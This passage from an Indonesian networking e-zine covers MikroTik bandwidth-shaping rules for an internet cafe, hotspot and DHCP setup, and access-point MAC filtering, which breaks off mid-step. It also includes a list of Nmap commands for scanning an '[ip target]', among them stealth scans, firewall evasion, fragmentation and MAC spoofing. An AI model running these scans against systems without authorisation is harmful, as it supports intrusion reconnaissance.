proses selanjutnya dengan tanda khusus. Seperti biasa, kita main copy paste lagi ^_^,

masuk ke terminal, selajutnya pastekan perintah dibawah ini.

Code: ip firewall mangle add action=mark-packet chain=prerouting comment="http-

video mark-packet" disabled=no layer7-protocol=http-video new-packet-

mark=http-video passthrough=no

/ip firewall mangle add action=mark-connection chain=prerouting comment="7z

DOWNS" disabled=no layer7-protocol="Extension \" .7z \"" new-connection-

mark="7z DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="7z DOWNS" disabled=no new-packet-mark=7z passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="asf DOWNS" disabled=no layer7-protocol="Extension \" .asf \"" new-

connection-mark="asf DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="asf DOWNS" disabled=no new-packet-mark=asf passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="avi DOWNS" disabled=no layer7-protocol="Extension \" .avi \"" new-

connection-mark="avi DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="avi DOWNS" disabled=no new-packet-mark=avi passthrough=no

protocol=tcp

Page 26: E zit #vol 2

26 e-ZIT #Vol 2 - Networking

/ip firewall mangle add action=mark-connection chain=prerouting

comment="bin DOWNS" disabled=no layer7-protocol="Extension \" .bin \"" new-

connection-mark="bin DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="bin DOWNS" disabled=no new-packet-mark=bin passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="flv DOWNS" disabled=no layer7-protocol="Extension \" .flv \"" new-

connection-mark="flv DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="flv DOWNS" disabled=no new-packet-mark=flv passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="iso DOWNS" disabled=no layer7-protocol="Extension \" .iso \"" new-

connection-mark="iso DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark= "iso DOWNS" disabled=no new-packet-mark=iso passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="mkv DOWNS" disabled=no layer7-protocol="Extension \" .mkv \"" new-

connection-mark="mkv DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="mkv DOWNS" disabled=no new-packet-mark=mkv passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="exe DOWNS" disabled=no layer7-protocol="Extension \" .exe \"" new-

connection-mark="exe DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="exe DOWNS" disabled=no new-packet-mark=exe passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="mov DOWNS" disabled=no layer7-protocol="Extension \" .mov \"" new-

connection-mark="mov DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="mov DOWNS" disabled=no new-packet-mark=mov passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="mp3 DOWNS" disabled=no layer7-protocol="Extension \" .mp3 \"" new-

connection-mark="mp3 DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="mp3 DOWNS" disabled=no new-packet-mark=mp3 passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="mp4 DOWNS" disabled=no layer7-protocol="Extension \" .mp4 \"" new-

connection-mark="mp4 DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="mp4 DOWNS" disabled=no new-packet-mark=mp4 passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="mpeg DOWNS" disabled=no layer7-protocol="Extension \" .mpeg \""

new-connection-mark="mpeg DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="mpeg DOWNS" disabled=no new-packet-mark=mpeg

Page 27: E zit #vol 2

27 e-ZIT #Vol 2 - Networking

passthrough=no protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="mpg DOWNS" disabled=no layer7-protocol="Extension \" .mpg \"" new-

connection-mark="mpg DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="mpg DOWNS" disabled=no new-packet-mark=mpg passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="nrg DOWNS" disabled=no layer7-protocol="Extension \" .nrg \"" new-

connection-mark="nrg DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="nrg DOWNS" disabled=no new-packet-mark=nrg passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="ram DOWNS" disabled=no layer7-protocol="Extension \" .ram \"" new-

connection-mark="ram DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="ram DOWNS" disabled=no new-packet-mark=ram passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="rar DOWNS" disabled=no layer7-protocol="Extension \" .rar \"" new-

connection-mark="rar DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="rar DOWNS" disabled=no new-packet-mark=rar passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting comment="rm

DOWNS" disabled=no layer7-protocol="Extension \" .rm \"" new-connection-

mark="rm DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="rm DOWNS" disabled=no new-packet-mark=rm passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="rmvb DOWNS" disabled=no layer7-protocol="Extension \" .rmvb \""

new-connection-mark="rmvb DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="rmvb DOWNS" disabled=no new-packet-mark=rmvb

passthrough=no protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="wav DOWNS" disabled=no layer7-protocol="Extension \" .wav \"" new-

connection-mark="wav DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="wav DOWNS" disabled=no new-packet-mark=wav passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="wma DOWNS" disabled=no layer7-protocol="Extension \" .wma \"" new-

connection-mark="wma DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="wma DOWNS" disabled=no new-packet-mark=wma passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="wmv DOWNS" disabled=no layer7-protocol="Extension \" .wmv \"" new-

connection-mark="wmv DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

Page 28: E zit #vol 2

28 e-ZIT #Vol 2 - Networking

connection-mark="wmv DOWNS" disabled=no new-packet-mark=wmv passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="zip DOWNS" disabled=no layer7-protocol="Extension \" .zip \"" new-

connection-mark="zip DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="zip DOWNS" disabled=no new-packet-mark=zip passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="youtube DOWNS" disabled=no layer7-protocol="YouTube " new-

connection-mark="youtube DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="youtube DOWNS" disabled=no new-packet-mark=youtube

passthrough=no protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="daa DOWNS" disabled=no layer7-protocol="Extension \" .daa \"" new-

connection-mark="daa DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="daa DOWNS" disabled=no new-packet-mark=daa passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="dat DOWNS" disabled=no layer7-protocol="Extension \" .dat \"" new-

connection-mark="dat DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="dat DOWNS" disabled=no new-packet-mark=dat passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="vcd DOWNS" disabled=no layer7-protocol="Extension \" .vcd \"" new-

connection-mark="vcd DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="vcd DOWNS" disabled=no new-packet-mark=vcd passthrough=no

protocol=tcp

/ip firewall mangle add action=mark-connection chain=prerouting

comment="cab DOWNS" disabled=no layer7-protocol="Extension \" .cab \"" new-

connection-mark="cab DOWNS" passthrough=yes protocol=tcp

/ip firewall mangle add action=mark-packet chain=postrouting comment=""

connection-mark="cab DOWNS" disabled=no new-packet-mark=cab passthrough=no

protocol=tcp

3. selajutnya tahap akhir, yaitu managemen bandwith. Disini kita menggunakan simple

queue. Yah seperti biasa kita kita gunakan metode yang sangat umum :”COPY

PASTE”: masuk ke terminal mikrotik dan pastekan perintah dibawah ini :

Code: /queue simple add name="exe" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=exe direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="rar" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=rar direction=both priority=8 queue=default-

Page 29: E zit #vol 2

29 e-ZIT #Vol 2 - Networking

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="zip" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=zip direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="7z" dst-address=0.0.0.0/0 interface=all parent=none

packet-marks=7z direction=both priority=8 queue=default-small/default-small

limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-threshold=0/0 burst-

time=0s/0s total-queue=default-small

/queue simple add name="cab" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=cab direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="asf" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=asf direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="mov" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=mov direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="wmv" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=wmv direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="mpg" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=mpg direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="mpeg" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=mpeg direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="mkv" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=mkv direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="avi" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=avi direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="flv" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=flv direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="wav" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=wav direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="rm" dst-address=0.0.0.0/0 interface=all parent=none

packet-marks=rm direction=both priority=8 queue=default-small/default-small

limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-threshold=0/0 burst-

Page 30: E zit #vol 2

30 e-ZIT #Vol 2 - Networking

time=0s/0s total-queue=default-small

/queue simple add name="mp3" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=mp3 direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="mp4" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=mp4 direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="ram" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=ram direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="rmvb" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=rmvb direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="dat" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=dat direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="daa" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=daa direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="iso" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=iso direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="nrg" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=nrg direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="bin" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=bin direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

/queue simple add name="vcd" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=vcd direction=both priority=8 queue=default-

small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-

threshold=0/0 burst-time=0s/0s total-queue=default-small

ip firewall mangle add action=mark-packet chain=prerouting comment="http-

video mark-packet" disabled=no layer7-protocol=http-video new-packet-

mark=http-video passthrough=no

/queue simple add name="youtube" dst-address=0.0.0.0/0 interface=all

parent=none packet-marks=http-video direction=both priority=8

queue=default-small/default-small limit-at=0/0 max-limit=32k/32k burst-

limit=0/0 burst-threshold=0/0 burst-time=0s/0s total-queue=default-small

Sumber : http://www.wiki.mikrotik.com

Page 31: E zit #vol 2

31 e-ZIT #Vol 2 - Networking

sory kalau configurasinya bukan dari awal configurasi, disini saya menganggap anda telah

sukses mengkonfigurasi mikrotiknya hingga terkoneksi :peace: :peace:

ket : experiment ini sangat cocok buat warnet dgn bandwidth kecil atau terbatas (contoh

kasus : warnet saya dulu) (khusus indonesia bagian timur yang harga bandwitdh mahal)

./regards

shockw4v3

Page 32: E zit #vol 2

32 e-ZIT #Vol 2 - Networking

Mikrotik > Cara Sederhana Membuat Hotspot

I'm comeback again...!!!

tanpa banyak basa basi lagi... mari kita lihat gimana caranya mengconfigurasi mikrotik

untuk membuat jaringan hotspot...

cekidot :dance: beri ip masing-masing LAN CARD!!

Code: [admin@Mikrotik] > ip address add address=192.168.0.2/30 interface=UpLink

[admin@Mikrotik] > ip address add address=192.168.1.1/24 interface=Lokal

[admin@Mikrotik] > ip address add address=192.168.2.1/24 interface=HotSpot

interface=HotSpot ini adalah koneksi ke wireless (wifi) kita Masukkan default routenya

Code: [admin@MikroTik] > ip route add gateway 192.168.0.1

Kemudian Setting HotSpotnya

Code: [admin@MikroTik] > ip hotspot setup

hotspot interface: HotSpot local address of network: 192.168.2.1/24

masquerade network: yes address pool of network: 192.168.2.2-192.168.2.99

select certificate: none ip address of smtp server: 0.0.0.0 dns servers:

192.168.2.1

dns name: hotspot.com name of local hotspot user: user password for the

user: ****password***

(user & password ganti terserah kita)

ok! sampai disini... settingan hotspot telah berhasil dilakukan dan siap dipakai....

./regards

Feenx_O

Page 33: E zit #vol 2

33 e-ZIT #Vol 2 - Networking

Mikrotik > Pisah Download, Browse & Game di 1 Line

ini kisah cerita waktu tahun 2009 :maybe: pada kebingungan pas waktu di suruh bos buka warnet + game online dengan 1 line isp..... akhirnya nemu juga cara setingnya.... nah sekarang langsung aja ah…..

Test running well di RB450 OS ver.4.5 ISP= Astinet TALIKOM 1Mbps Mangle: GAME contoh buat Point Blank, game lain sesuaikan aja port/ip nya karna ane cuma sediakan Point Blank aja di warnet :)

Code: chain=game action=mark-connection new-connection-mark=Game passthrough=yes

protocol=tcp dst-address=203.89.146.0/23 dst-port=39190 comment=”Point

Blank”

Code: chain=game action=mark-connection new-connection-mark=Game passthrough=yes

protocol=udp dst-address=203.89.146.0/23 dst-port=40000-40010

Code: chain=game action=mark-packet new-packet-mark=Game_pkt passthrough=no

connection-mark=Game

Code: chain=prerouting action=jump jump-target=game

POKER - paling banyak main bahkan game FB terlaris di kota ane untuk saat itu

Code: chain=forward action=mark-connection new-connection-mark=Poker_con

passthrough=yes protocol=tcp dst-address-list=LOAD POKER comment=”POKER”

Code: chain=forward action=mark-connection new-connection-mark=Poker_con

passthrough=yes protocol=tcp content=statics.poker.static.zynga.com

Code: chain=forward action=mark-packet new-packet-mark=Poker passthrough=no

connection-mark=Poker_con

Page 34: E zit #vol 2

34 e-ZIT #Vol 2 - Networking

BROWSING

Code: chain=forward action=mark-connection new-connection-mark=http

passthrough=yes protocol=tcp in-interface=WAN out-interface=Lan packet-

mark=!Game_pkt connection-mark=!Game connection-bytes=0-262146

comment=”BROWSE”

Code: chain=forward action=mark-packet new-packet-mark=http_pkt passthrough=no

protocol=tcp connection-mark=http

UPLOAD

Code: chain=prerouting action=mark-packet new-packet-mark=Upload passthrough=no

protocol=tcp src-address=192.168.0.0/24 in-interface=Lan packet-

mark=!icmp_pkt comment=”UPLOAD”

LIMIT DOWNLOAD

Code: chain=forward action=mark-connection new-connection-mark=Download

passthrough=yes protocol=tcp in-interface=WAN out-interface=Lan packet-

mark=!Game_pkt connection-mark=!Poker_con connection bytes=262146-

4294967295 comment=”LIMIT DOWNLOAD”

Code: chain=forward action=mark-packet new-packet-mark=Download_pkt

passthrough=no packet-mark=!Game_pk> connection-mark=Download

QUEUE

queue type

Code: name=”Download” kind=pcq pcq-rate=256000 pcq-limit=50 pcq-classifier=dst-

address pcq-total-limit=2000

Code: name=”Http” kind=pcq pcq-rate=1M pcq-limit=50 pcq-classifier=dst-address

pcq-total-limit=2000

Code: name=”Game” kind=pcq pcq-rate=0 pcq-limit=50 pcq-classifier=src-

address,dst-address,src-port,dst-port pcq-total-limit=2000

Code: name=”Upload” kind=pcq pcq-rate=0 pcq-limit=50 pcq-classifier=src-address

pcq-total-limit=2000

Page 35: E zit #vol 2

35 e-ZIT #Vol 2 - Networking

Queue Tree

Code: name=”Main Browse” parent=Lan limit-at=0 priority=8 max-limit=1M burst-

limit=0 burst-threshold=0 burst-time=0s

Code: name=”Browse” parent=Main Browse packet-mark=http_pkt limit-at=0 queue=Http

priority=8 max-limit=1M burst-limit=0 burst-threshold=0 burst-time=0s

Code: name=”Game” parent=global-total packet-mark=Game_pkt limit-at=0 queue=Game

priority=1 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s

Code: name=”Poker” parent=global-out packet-mark=Poker limit-at=0 queue=Game

priority=3 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s

Code: name=”Download” parent=global-out packet-mark=Download_pkt limit-at=0

queue=Download priority=8 max-limit=256k burst-limit=0 burst-threshold=0

burst-time=0s

Code: name=”Main Upload” parent=global-in limit-at=0 priority=8 max-limit=256k

burst-limit=0 burst-threshold=0 burst-time=0s

Code: name=”Upload” parent=Main Upload packet-mark=Upload limit-at=0 queue=Upload

priority=8 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s

HASILNYA BROWSING 1Mbs > bagi rata 1 warnet DOWNLOAD 256Kbps > bagi rata 1 warnet GAME > seadanya bandwith sesuai kebutuhan 1 warnet POKER > seadanya bandwith sesuai kebutuhan 1 warnet UPLOAD > seadanya bandwith bagi rata sesuai kebutuhan 1 warnet mungkin setingan ini belum sempurna.... buat kk ama om yg lain mungkin bisa kasih

pencerahan ato tambahan

./regards

shockw4f3

Page 36: E zit #vol 2

36 e-ZIT #Vol 2 - Networking

Mikrotik > Leases Static DHCP

Kebetulan ne cara mau dipake buat keperluan sendiri. Berhubung Hotspot di kantor pake

DHCP, trus HP yang connect juga sering dipake buat experiment di LAN, tapi karena IP LAN

nya DHCP jadinya server di HP jadi berubah-ubah. Dan karena tidak ada opsi untuk setting IP

di HP, jadi solusinya adalah meminjamkan IP dari DHCP secara statik dari mikrotik. Yarp,

langsung ke command nya ja...

Code: [admin@MikroTik] > /ip dhcp-server lease add address=1.2.3.4 mac-

address=aa:bb:cc:dd:ee:ff server=dhcp_pool_name disabled=no

Simple aja sih, untuk parameternya tinggal menyesuaikan device masing-masing yang akan

di set. Kalo Static DHCP nya banyak, biar gak bingung, masing-masing rules diatas

tambahkan parameter "comment". Ah, kayaknya udah pada tauk :D

Semoga bermanfaat ja buat yang belum tau. ^_^

Source: http://forum.mikrotik.com/viewtopic.php?f=13&t=42587

./regards

JMozac

Page 37: E zit #vol 2

37 e-ZIT #Vol 2 - Networking

Network Scanning With NMAP

Halooooooo Heuheu,

Yup ketemu lagi sama Bifi,

pada thread sebelummnya kan kaka shockw4v3, udah bagi-bagi tips tentang command-command ping kan, itu lho command atau apalah, bawaan hampir semua OS untuk mengecek komunikasi antar komputer dalam sebuah jaringan melalui protocol TCP/IP,,,

Nah seperti gambar di atas, Kali ini Bifi mau share tentang tips network scanning with Nmap, atau bahasa torang dong bilang scan jaringan pake Nmap, nah apa itu Nmap ??? Ini dia penjelasannya :

"Nmap (“Network Mapper”) merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya" di kutip dari situs resmi NMAP...

nah, untuk para networker, pasti udah nggak asing lagi dengan tools yang 1 ini.. Ok,

kebanyakan penjelasan nih,

langsung aja ah,....

Open Terminal Truz Coba Aja Satu-Satu

kayak gambar dibawah ini

Page 38: E zit #vol 2

38 e-ZIT #Vol 2 - Networking

Neh, Command-Commandnya

Code: nmap -n -sn [ip target] < Multi ip address dan subnet

nmap --packet-trace [ip target] < Menampilkan paket diterima dan dikirim

nmap --iflist < Menampilkan semua interface dan rute

nmap 192.168.2.0/24 --exclude [IP] < Excluding hosts/networks

nmap -A [ip target] < Scan OS Dan Layanan (service target)

nmap -O [ip target] < remote operating system

nmap -sP [ip target] < Mendeteksi layanan dan device yang sedang up

nmap -sV [ip target] < Mendeteksi versi dari layanan (service)

nmap -sA [ip target] < Mendeteksi firewall

Code: nmap -sN [ip target] < Scanning firewall | TCP Null Scan untuk menipu

firewall untuk memberikan respon ,dalam kondisi TCP flag header adalah nol

(null)

nmap -sF [ip target] < Scanning firewall | TCP Fin scan untuk mengecek

firewall ,hanya TCP FIN bit

nmap -sX [ip target] < Scanning firewall | Penggunaan TCP Xmas & setting

FIN, PSH, dan URG

Code: nmap -f [site target] < Firewall untuk packets fragments

nmap -PN [site target] < Melakukan scanning disaat target menggunakan

firewall

nmap -F [ip target] < Fast Scann

nmap --reason [ip target] < Opsi Reason

nmap --open [ip target] < Menampilkan hanya port yang terbuka

nmap -T5 [ip target] < Scanning terhadap subnet

Page 39: E zit #vol 2

39 e-ZIT #Vol 2 - Networking

Code: nmap -p 80 [ip target] < Melakukan scann terhadap port tertentu .. dalam

hal ini port 80

nmap -p T:80 [ip target] < Melakukan scann terhadap port tertentu dengan

protokol tcp

nmap -p U:53 [ip target] < Melakukan scann terhadap port tertentu dengan

protokol udp

Code: nmap -p "*" [ip target] < Scann seluruh port dengan opsi "*"

nmap --top-ports 3 [IP] < top ports

nmap -sO [ip target] < IP protocol PING

nmap -PS [ip target] < TCP ACK (PA) and TCP Syn (PS) ping

nmap -PA [ip target] < Untuk penggunaan TCP Syn

Code: nmap -sS [ip target] < TCP SYN Scan | Penggunaan Stealthy scan [-sS]

nmap -sT [ip target] < TCP SYN Scan | TCP connect scan (warning: no stealth

scan) [-sT]

nmap -sA [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports

menggunakan TCP ACK scan [-sA]

nmap -sW [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports

menggunakan TCP Window scan [-sW]

nmap -sM [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports

menggunakan TCP Maimon scan

Code: nmap -PO [ip target] < IP protocol ping

nmap -sU [ip target] < UDP services (UDP scan)

nmap -PU [ip target] < UDP ping | Melakukan scanning terhadap ip, khusus

mencari port UDP

nmap -PU 2000.2001 [ip target] < UDP ping | Melakukan scanning port UDP

yang telah di tentukan

Code: nmap --spoof-mac [mac address palsu kita] [ip target] < MAC address

spoofing

nmap --spoof-mac 0 [IP HOST] < Jika anda hendak menggunakan mac address

spoofing secara random (acak)

Mungkin itu saja sedikit command-command NMAP dari saya,,, silahkan di coba ... eheheheheh

./regards

Bifi

Page 40: E zit #vol 2

40 e-ZIT #Vol 2 - Networking

Security > Setting Mac Filtering Pada AP TP-LINK TL-WA610G

yup yup...i'm back....sesuai dengan judulnya, kali ini qt akan membangun security mac

filtering... sedikit penjelasan :

Wireless Access Point (WAP) adalah perangkat keras yang memungkinkan perangkat

wireless lain (seperti laptop, ponsel) untuk terhubung ke jaringan kabel

menggunakan Wi-fi, bluetooh atau perangkat standar lainnya.

Access Point berfungsi sebagai pengatur lalu lintas data, sehingga memungkinkan

banyak Client dapat saling terhubung melalui jaringan.

Sebagai Hub/Switch yang bertindak untuk menghubungkan jaringan lokal dengan

jaringan wireless/nirkabel, Access point dapat memancarkan atau mengirim koneksi

data / internet melalui gelombang radio, ukuran kekuatan sinyal juga mempengaruhi

area coverage yang akan dijangkau, semakin besar kekuatan sinyal (ukurannya dalam

satuan dBm atau mW) semakin luas jangkauannya.

Media Acces Control (MAC) adalah identitas sebuah perangkat jaringan yg

direprensentasikan dalam bentuk hardware-address atau physical address untuk

setiap node yg terhubung dalam sebuah jaringan

sedikit lagi penjelasan yak...yang sabar yak, kata pepatah, orang sabar selalu berada

disamping pagar

Quote:MAC filter fungsinya untuk menseleksi komputer mana yang boleh masuk kedalam

jaringan berdasarkan MAC Address. Bila tidak terdaftar, tidak akan bisa masuk ke jaringan.

MAC filter Address akan membatasi user dalam mengakses jaringan wireless. Alamat MAC

dari perangkat komputer user akan didaftarkan terlebih dahulu agar bisa terkoneksi dengan

jaringan wireless,

ok langsung kita masuk k intinya...persiapan :

1. Laptop/PC juga boleh

2. Kabel LAN (minimal 1 meter) lebih juga boleh

3. Access Point (kali ini ane menggunakan TP-LINk TLWA610G)

4. yang paling penting adalah rokok coy

tahap :

1. colok kabel LAN ke AP lalu ujung yg satunya lagi colok ke LAN card laptop

2. buka browser, ketik pada address bar ketik 192.168.1.1 lalu tekan enter. qt akan

diminta memasukan username dan password. default username dan password pada

acces point adalah username : admin password : admin.... lalu tekan enter...

Page 41: E zit #vol 2

41 e-ZIT #Vol 2 - Networking

3. setelah masuk ke tampilan awal, lalu click network, seperti d bawah ini :

o Type : ada dua pilihan, yaitu static IP dan Dinamic IP (DHCP). pilih sesuai

kebutuhan. kali ini ane make Static IP (ipnya qt input manual)

o IP Addres, defaultnya tadi 192.168.1.1, bisa diganti, terserah teman-teman

sekalian mau diganti degan berapa, kali ini qt ganti dengan 192.168.1.111 (IP

kelas C)

